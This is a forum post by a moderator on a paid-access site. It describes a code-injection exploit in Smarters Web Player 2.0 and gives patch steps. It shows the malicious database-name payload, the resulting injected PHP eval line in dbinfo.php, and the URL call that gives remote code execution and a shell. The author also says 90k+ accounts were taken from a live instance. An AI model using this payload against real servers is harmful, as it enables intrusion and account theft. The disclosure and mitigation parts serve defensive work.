Download VIP Access : Smarters Web Player 2.0 Exploit & Patch

Homer

Moderator
Apr 29, 2023
257
5
18
Here is a short summary of the latest exploit in Smarters Web Player 2.0 which we released proof of late last year - Plus details of how to patch it. We've not released any of the 90k+ accounts (despite many many people asking... ) which were recovered and won't be releasing these as I have no interest in harming hard-working providers. Smarters seem to have made permission changes to their public instance so it is no longer vulnerable. It seems smarters have also released a further version which includes a salt to (I think) encrypt the stored user details better however it is still vulnerable to this injection attack without further mitigation.

The Exploit:
When setting up the webplayer initially, a page named 'dbconfiguration.php' is used to create and populate a file named 'dbinfo.php' which contains the connection information for the MySQL database - this is facilitated by an AJAX call to 'includes/outer-ajax.php' with the db details. This page first checks the database is reachable using the entered details and if all is OK then saves the details to dbinfo.php - this is the vulnerable part. I was able to use a publically accessible MySQL server with a database named ";eval($_GET['a']);$t=" (including quotes) - which is a perfectly valid name for a MySQL database. This means the validation/connection check was passed and the details written to dbinfo.php looked something like this:

PHP:
<?php
$dbhost = "XXX.XXX.XXX.XXX"; //IP of an SQL server I have control over
$dbusername = "USER"; //Real username for above MySQL db
$dbpassword = "PASS"; //Real password for above MySQL db
$dbname = "";eval($_GET['a']);$t=""; //Exploited line, dbname is now blank but we have our eval clause in there.

So we can then call WEBPLAYERURL/dbinfo.php?a=PHPCODEHERE and anything we like can be executed. In most cases PHP code can be traversed and shell commands can be executed, giving a remote shell into the server.

Patching the exploit.
  1. The most obvious way to patch the exploit is to patch the vulnerable outer-ajax.php file to ensure no PHP escaping characters can be inserted into the file. I have included a patched outer-ajax.php below which returns an error if any such characters are attempted.
  2. File permissions - as soon as the webplayer is installed and configured, change the dbinfo.php file to be non-writeable by the user which the web server is running as.
  3. Best-practice firewall configuration, make sure no outbound MySQL (or anything unnecessary for that matter...) are allowed.
Please upgrade your account to access the hidden content.